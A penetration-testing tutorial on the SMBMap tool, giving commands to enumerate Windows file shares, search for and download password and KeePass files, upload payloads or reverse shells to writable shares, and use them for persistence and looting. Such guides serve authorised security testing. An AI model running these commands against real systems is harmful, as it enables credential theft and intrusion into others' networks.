smbmap:

SMBMap is a powerful post-exploitation and enumeration tool used to gain insight into Windows file shares across a network. It allows pentesters to:

  • Enumerate shares
  • Access files/folders
  • Download/upload files
  • Search for specific file types
  • Identify permissions (read/write/execute)
  • Discover misconfigured shares

Unlike tools like smbclient or rpcclient, smbmap is more intuitive and fast for automated enumeration during internal network engagements. It’s especially useful when looking for open shares that might contain sensitive files or when planning lateral movement.

On Kali Linux, it’s preinstalled. If not:

sudo apt install smbmap

Or from GitHub:

git clone https://github.com/ShawnDEvans/smbmap.git
cd smbmap
pip install -r requirements.txt
smbmap -H 10.10.10.5
# Check for accessible shares anonymously

If guest access is allowed, this will list readable or writable shares without credentials.

smbmap -H 10.10.10.5 -u user -p password
# Authenticated scan to list available shares and access rights

You can also specify a domain:

smbmap -H 10.10.10.5 -u user -p password -d CORP
smbmap -H 10.10.10.5 -u user -p password -d CORP -s "Users"
# See access rights for a specific share
smbmap -H 10.10.10.5 -u user -p password -r (share_NAME)
# Recursively list directories and files

Useful for finding documents, passwords, or scripts.

smbmap -H 10.10.10.5 -u user -p password -R -A ".kdbx"
# -A = search for a file pattern

This is an underrated trick to spot KeePass databases, passwords.txt, or even credential spreadsheets.

smbmap -H 10.10.10.5 -u user -p password -R -A "password" --download
# Downloads files matching the keyword
smbmap -H 10.10.10.5 -u user -p password -r "Temp" --upload ./payload.exe
# Uploads a file to a writable share

This is useful for dropping payloads, reverse shells, or HTA files for execution via user interaction.

smbmap -H 10.10.10.5 -u user -p password -P
# -P = Only print shares with write access

Any writable share could be leveraged for lateral movement, persistence, or privilege escalation (e.g., via startup folder abuse or DLL hijacking).

Once you’ve identified shares or dropped payloads:

  • Create Persistence: Upload a malicious script to a startup folder if you have write access.
  • Credential Theft: Look for .kdbx, .config, .rdp, .xml, and .bat files.
  • Lateral Movement: Upload tools/scripts to writable shares for execution from another host.
  • Looting: Dump files like finance spreadsheets, backups, saved browser passwords, or AD enumeration scripts.
GoalExample
Find sensitive filessmbmap -R -A password
Check writable sharessmbmap -P
Upload payload--upload reverse.exe
Enumerate without credssmbmap -H <ip>

smbmap is often underrated, but it shines in post-exploitation and internal enumeration phases. It’s a go-to tool when credentials are available or guest access is enabled. Pair it with other tools like crackmapexec or rpcclient for maximum SMB dominance.

Scroll to Top